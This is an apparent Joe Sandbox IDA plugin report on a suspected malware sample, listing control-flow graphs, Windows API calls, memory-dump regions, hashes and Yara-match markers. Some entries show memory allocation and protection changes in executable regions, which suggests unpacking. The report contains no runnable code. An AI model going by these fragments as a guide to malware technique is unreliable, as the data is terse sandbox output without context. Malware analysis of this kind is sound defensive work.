                                                                  • API String ID: 2915228174-0
                                                                  • Opcode ID: 438c1b675aede16d5b23d96276a9c3267abe4e4e08ac12469ed03f93fc0506d4
                                                                  • Instruction ID: 74d37024f0b92803fb6773c1ad3227819c928fd109ab5f71c8b656f4b4a07c43
                                                                  • Opcode Fuzzy Hash: 438c1b675aede16d5b23d96276a9c3267abe4e4e08ac12469ed03f93fc0506d4
                                                                  • Instruction Fuzzy Hash: 2561B771908119AFDF11EFA8C894AEFBFB9AF05304F24495AED04A7311D339D901DB69

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 665 486ed7-486f2c call 47ab60 668 486f2e 665->668 669 486fa1-486fb1 call 47a256 665->669 671 486f34 668->671 672 486f3a-486f3c 671->672 674 486f3e-486f43 672->674 675 486f56-486f7b WriteFile 672->675 676 486f4c-486f54 674->676 677 486f45-486f4b 674->677 678 486f99-486f9f GetLastError 675->678 679 486f7d-486f88 675->679 676->672 676->675 677->676 678->669 679->669 680 486f8a-486f95 679->680 680->671 681 486f97 680->681 681->669
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00487480,00000000,?,00000000,0048112F,00000000,00000000), ref: 00486F73
                                                                  • GetLastError.KERNEL32(?,00487480,00000000,?,00000000,0048112F,00000000,00000000,?,00000000,?,004797B5,0048112F,00000000,004797B5,?), ref: 00486F99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID:
                                                                  • API String ID: 442123175-0
                                                                  • Opcode ID: 77b1637cced03593e7d2b68e030930a0aa4ca0277efb8050c71b1c804cbd3a22
                                                                  • Instruction ID: d6b515e606f1e46eb124852621961bf30aee8a74f609339d5eee2f57b0254daa
                                                                  • Opcode Fuzzy Hash: 77b1637cced03593e7d2b68e030930a0aa4ca0277efb8050c71b1c804cbd3a22
                                                                  • Instruction Fuzzy Hash: 4321B430A001199FCF15DF19DD809DDB7BAEB4D305F1584AEEA05D7211D630DD42CB68

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 682 4867d0-4867d5 683 4867d7-4867ef 682->683 684 4867fd-486806 683->684 685 4867f1-4867f5 683->685 687 486818 684->687 688 486808-48680b 684->688 685->684 686 4867f7-4867fb 685->686 689 486872-486876 686->689 692 48681a-486827 GetStdHandle 687->692 690 48680d-486812 688->690 691 486814-486816 688->691 689->683 693 48687c-48687f 689->693 690->692 691->692 694 486829-48682b 692->694 695 486854-486866 692->695 694->695 696 48682d-486836 GetFileType 694->696 695->689 697 486868-48686b 695->697 696->695 698 486838-486841 696->698 697->689 699 486849-48684c 698->699 700 486843-486847 698->700 699->689 701 48684e-486852 699->701 700->689 701->689
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0048681C
                                                                  • GetFileType.KERNEL32(00000000), ref: 0048682E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleType
                                                                  • String ID:
                                                                  • API String ID: 3000768030-0
                                                                  • Opcode ID: b0e99ad23464358d0aadaa6f17a0d975d544bc42e48eb297cbde5f7e838a7024
                                                                  • Instruction ID: 8b813c3a9813a6e87818b62ac0593211c3dd0402996334ec5e0593cf61e51a92
                                                                  • Opcode Fuzzy Hash: b0e99ad23464358d0aadaa6f17a0d975d544bc42e48eb297cbde5f7e838a7024
                                                                  • Instruction Fuzzy Hash: DA11D27110575146C7707E3E8C8862BBAA4A756334B3A0B2FD4BA866F1C338C846D749
                                                                  APIs
                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,004A6918,004797B5,00000002,004797B5,00000000,?,?,?,0048B19D,00000000,?,004797B5,00000002,004A6918), ref: 0048B0CF
                                                                  • GetLastError.KERNEL32(004797B5,?,?,?,0048B19D,00000000,?,004797B5,00000002,004A6918,00000000,004797B5,00000000,004A6918,0000000C,00481206), ref: 0048B0DC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: 6d3c2641d3032c800ae683a13e13de9ec99991297a93620fb4f6c47ebff77d83
                                                                  • Instruction ID: c5777c48bd73502683d1da21023c5ba6be1468841a9a09a9b2b717a6c4e784c1
                                                                  • Opcode Fuzzy Hash: 6d3c2641d3032c800ae683a13e13de9ec99991297a93620fb4f6c47ebff77d83
                                                                  • Instruction Fuzzy Hash: 7801D632614515AFCF059F59DC45C9F3F29EB85320F24051AF8119B2A1E776DD42CBD4
                                                                  APIs
                                                                    • Part of subcall function 034C98D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 034C9964
                                                                  • VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 034C77E7
                                                                  • VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 034C780A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProtectVirtual$LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 895956442-0
                                                                  • Opcode ID: f8598576150d5a0620274e77ba00d3ce24ec92924df4b670bdb29c09dfee1e24
                                                                  • Instruction ID: c6342b4ca766626b07acdb298d0ff9a0299e3ebc10afe18ca408f13e4835b756
                                                                  • Opcode Fuzzy Hash: f8598576150d5a0620274e77ba00d3ce24ec92924df4b670bdb29c09dfee1e24
                                                                  • Instruction Fuzzy Hash: 27F0D1BE2202047FE250E661CC01FFB76ECEF44A40F04442DFB06DA080EB60AA01CBB9
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,004908E5,0047DE01,00000000,0047DE01,?,00490B86,0047DE01,00000007,0047DE01,?,0049107A,0047DE01,0047DE01), ref: 00487547
                                                                  • GetLastError.KERNEL32(0047DE01,?,004908E5,0047DE01,00000000,0047DE01,?,00490B86,0047DE01,00000007,0047DE01,?,0049107A,0047DE01,0047DE01), ref: 00487552
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 485612231-0
                                                                  • Opcode ID: 99c648fb4edb8a1e74cfd794b2652f5ee4b6e3d463c120a83265f6f44b23974a
                                                                  • Instruction ID: 9bc556a9c5036cf9f66edffa3e904d75f73c9767438038bf8729cd2071cd7d6d
                                                                  • Opcode Fuzzy Hash: 99c648fb4edb8a1e74cfd794b2652f5ee4b6e3d463c120a83265f6f44b23974a
                                                                  • Instruction Fuzzy Hash: 8FE08632104214BBDF113BA5EC09B5D3B689B15B95F20443BF60886160D7398D41C79C
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 034C859E
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 034C88E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2087232378-0
                                                                  • Opcode ID: 2923ffbbd088fcb14a2ba6a0f44f74b26ffba7a218e7267c1327e4f48e88d229
                                                                  • Instruction ID: c18c558b03b4b663ac7a54776d6e49e738bd57dc5c3de8c3852e18eadd808ce1
                                                                  • Opcode Fuzzy Hash: 2923ffbbd088fcb14a2ba6a0f44f74b26ffba7a218e7267c1327e4f48e88d229
                                                                  • Instruction Fuzzy Hash: B8B1F339520785AFDBA1EA61CC80BA7F7E8FF45300F18092FE5598E650E731E550CBA9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7$(&q
                                                                  • API String ID: 0-3514297410
                                                                  • Opcode ID: 750a7ca4f94e3c802b29c2f4346b361facc6851f7cbaa926473408c2e91d4606
                                                                  • Instruction ID: d96de2ed987cff58fb92241fee5b6c95d9054db67cb2269e16856245db5914b3
                                                                  • Opcode Fuzzy Hash: 750a7ca4f94e3c802b29c2f4346b361facc6851f7cbaa926473408c2e91d4606
                                                                  • Instruction Fuzzy Hash: 0021B175E042198FCF14DFAEE404B9EBBF5EB88320F14846AD518A7300D73599058BA5
                                                                  APIs
                                                                    • Part of subcall function 00476430: std::ios_base::clear.LIBCPMTD ref: 00476461
                                                                  • fpos.LIBCPMTD ref: 0047399A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: fposstd::ios_base::clear
                                                                  • String ID:
                                                                  • API String ID: 1508181384-0
                                                                  • Opcode ID: c4eac059561dc1a441d316cd4bac65796142afa7a96230efab71d6070833d705
                                                                  • Instruction ID: be9427fc233d149ee76921ada9bcb56f17a963b5201fedf0f67338fb078d02f8
                                                                  • Opcode Fuzzy Hash: c4eac059561dc1a441d316cd4bac65796142afa7a96230efab71d6070833d705
                                                                  • Instruction Fuzzy Hash: CB314CB4A006199FCB04DFA9C991BEEB7B2FF48714F10861DE525AB391CB34A901CB94
                                                                  APIs
                                                                    • Part of subcall function 00475750: std::ios_base::good.LIBCPMTD ref: 0047578C
                                                                  • char_traits.LIBCPMTD ref: 004786CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: char_traitsstd::ios_base::good
                                                                  • String ID:
                                                                  • API String ID: 160274934-0
                                                                  • Opcode ID: 3784d4e40c733940e65a17f0a7483507099b66739a60898fdcb1d80ea2409338
                                                                  • Instruction ID: bef25387786df8ff463d00b67ce2a1e5896ca94cf28e270937ce8cb39de11c1b
                                                                  • Opcode Fuzzy Hash: 3784d4e40c733940e65a17f0a7483507099b66739a60898fdcb1d80ea2409338
                                                                  • Instruction Fuzzy Hash: 44311EB5D002099FDB04DF95C991AEEBBB5FF48314F20811EE5157B341DB39AA01CBA5
                                                                  APIs
                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00474C8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                  • String ID:
                                                                  • API String ID: 3936482309-0
                                                                  • Opcode ID: 4e227f32b08fb9b5174a51bad8fb701afddd30dc2a7a01d74262b0c8dc9bc91d
                                                                  • Instruction ID: e774e0e7a549e48b111ea45916b3d23957e95b4e1546783c9adafb40b115e57f
                                                                  • Opcode Fuzzy Hash: 4e227f32b08fb9b5174a51bad8fb701afddd30dc2a7a01d74262b0c8dc9bc91d
                                                                  • Instruction Fuzzy Hash: 92313CB4A0061ADFDB04CF98CD91BAEB7B2FF85708F10865DE9166B381C775A900CB95
                                                                  APIs
                                                                  • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0047375A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                  • String ID:
                                                                  • API String ID: 3936482309-0
                                                                  • Opcode ID: 60137ea6386b6206819dfcc4aaafcf6d588eff34dd8d9dc8c78ec3df8819c6a0
                                                                  • Instruction ID: 4da8d591f401f82319563d745d074df883e2cdf972c4ce6290821f7da060001f
                                                                  • Opcode Fuzzy Hash: 60137ea6386b6206819dfcc4aaafcf6d588eff34dd8d9dc8c78ec3df8819c6a0
                                                                  • Instruction Fuzzy Hash: 4A314DB4A00619DFDB04DF98C991BAEB7B2FF85704F20865DE4166B381C775AD00CB95
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: __wsopen_s
                                                                  • String ID:
                                                                  • API String ID: 3347428461-0
                                                                  • Opcode ID: 30c52073ab9ffa15429a4c34d1d2196a9c26691b65394b229633366ef72b1219
                                                                  • Instruction ID: 5ac98ab9f1aeb007dca19ddddca9accbc628f0c61c94c192e31e27c1267d0ca0
                                                                  • Opcode Fuzzy Hash: 30c52073ab9ffa15429a4c34d1d2196a9c26691b65394b229633366ef72b1219
                                                                  • Instruction Fuzzy Hash: 49111871A0410AAFCF05DF59E94599F7BF8EF48304F14446AF805AB351D770EA11CBA8
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,0047112E,0047EC9B,?,00486674,00000001,00000364,00000006,000000FF,0047EC9B,0047EC9B,?,0047DF6C,004813BE,FF85FFFF), ref: 004886C7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 2f46f3752c0ef4dc2d2da6f41d24daf275a23c5bf8fd88850363d47ccf24eab2
                                                                  • Instruction ID: b46441f3f7446d7e322c0fa2ccb104e399df6d134b635bae074cb2eaf51133ee
                                                                  • Opcode Fuzzy Hash: 2f46f3752c0ef4dc2d2da6f41d24daf275a23c5bf8fd88850363d47ccf24eab2
                                                                  • Instruction Fuzzy Hash: A9F0B431601226A7EB217B73AD05A5F3749BF417A0B64482BE804B6280FE69DC0187ED
                                                                  APIs
                                                                  • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 0047A3F3
                                                                    • Part of subcall function 0047B1A3: RaiseException.KERNEL32(E06D7363,00000001,00000003,0047141C,?,?,?,0047141C,?,004A6F3C), ref: 0047B203
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionRaisestdext::threads::lock_error::lock_error
                                                                  • String ID:
                                                                  • API String ID: 3447279179-0
                                                                  • Opcode ID: 3a7327392ee682b6c7997c4e9b59fd7f0af0b3c0803c113c7e6075fd95dc01ce
                                                                  • Instruction ID: c16061af7b613c6c5fc70f3efce557fde1518ad09b18830b513188c4ceea197b
                                                                  • Opcode Fuzzy Hash: 3a7327392ee682b6c7997c4e9b59fd7f0af0b3c0803c113c7e6075fd95dc01ce
                                                                  • Instruction Fuzzy Hash: 10F0BB3480020C768B20B675FC16ADD776C9900354B50C627B92D514D1EF78AA5582DE
                                                                  APIs
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 00478B47
                                                                    • Part of subcall function 00471400: stdext::threads::lock_error::lock_error.LIBCPMTD ref: 00471409
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Concurrency::cancel_current_taskstdext::threads::lock_error::lock_error
                                                                  • String ID:
                                                                  • API String ID: 2103942186-0
                                                                  • Opcode ID: 34cd3f60f88d206d2cb8382d133d600ef80fada66bc42b2d2ccf203aa9ae276f
                                                                  • Instruction ID: 80b81a8377eb30cc3ea7a01efc852db79bd5eee646b7cc0decb0cf995469849d
                                                                  • Opcode Fuzzy Hash: 34cd3f60f88d206d2cb8382d133d600ef80fada66bc42b2d2ccf203aa9ae276f
                                                                  • Instruction Fuzzy Hash: 88F031B4E00108EBCB04EFA8D4856EEF7B5AF44348F10C1AEE81997355E634AE51CB89
                                                                  APIs
                                                                  • allocator.LIBCONCRTD ref: 00478925
                                                                    • Part of subcall function 00477540: _Allocate.LIBCONCRTD ref: 00477554
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Allocateallocator
                                                                  • String ID:
                                                                  • API String ID: 40054573-0
                                                                  • Opcode ID: 88af452f1867c620a7ed91bca1dbf0af90099f589f6509480a8af0c0073b2557
                                                                  • Instruction ID: 2800330440887ac8fe4e4ed4ff38e68838814c2baf9046e3305d7c9669987637
                                                                  • Opcode Fuzzy Hash: 88af452f1867c620a7ed91bca1dbf0af90099f589f6509480a8af0c0073b2557
                                                                  • Instruction Fuzzy Hash: 990146B4E05209EFCB04DF99D5919AEBBF1EF89304F6081A9D909A7341D730AA51CF94
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,0048F487,00000000,?,0048F487,00000220,?,?,00000000), ref: 00489077
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 9f83a426e13ef65bae3c93aab635455fdd81107a6703ec6c12dbc4185d9cab79
                                                                  • Instruction ID: 2ca505a8195412a17e923be73fb3f9607deeb7c64383eb280a1e7d2bde35229b
                                                                  • Opcode Fuzzy Hash: 9f83a426e13ef65bae3c93aab635455fdd81107a6703ec6c12dbc4185d9cab79
                                                                  • Instruction Fuzzy Hash: 6AE0E531205B2157EA313676AC04B7F7A489B837A0F2C0927ED00A22C0CBACCC0183AD
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,00000000,?,004957F2,?,?,00000000,?,004957F2,?,0000000C), ref: 0049541F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 9890b7d942df413a3bcaddcdb3982ecde10715eb4fb780602675b1cb29ad746d
                                                                  • Instruction ID: a5f6c47c2e2b36c3ea9caf596acb9cbf6f738087ab9fbe8bdae678d9106f3b16
                                                                  • Opcode Fuzzy Hash: 9890b7d942df413a3bcaddcdb3982ecde10715eb4fb780602675b1cb29ad746d
                                                                  • Instruction Fuzzy Hash: 83D06C3200010DBBDF029F84DD06EDA3BAAFB4C754F014010BA1856020C732E821AB94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7
                                                                  • API String ID: 0-2005406323
                                                                  • Opcode ID: d927f713b523c0cc2236aa39211f85cf3358b5a110e97295b75d18f46a462a21
                                                                  • Instruction ID: b001077fc491f4c43eb26f52d33229aa62e01476a39a723b1853ed328508ce5f
                                                                  • Opcode Fuzzy Hash: d927f713b523c0cc2236aa39211f85cf3358b5a110e97295b75d18f46a462a21
                                                                  • Instruction Fuzzy Hash: 4A6106B5E002589FDF15CFA9D484A9DFBF1BF88310F24816AE819AB350EB749945CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7
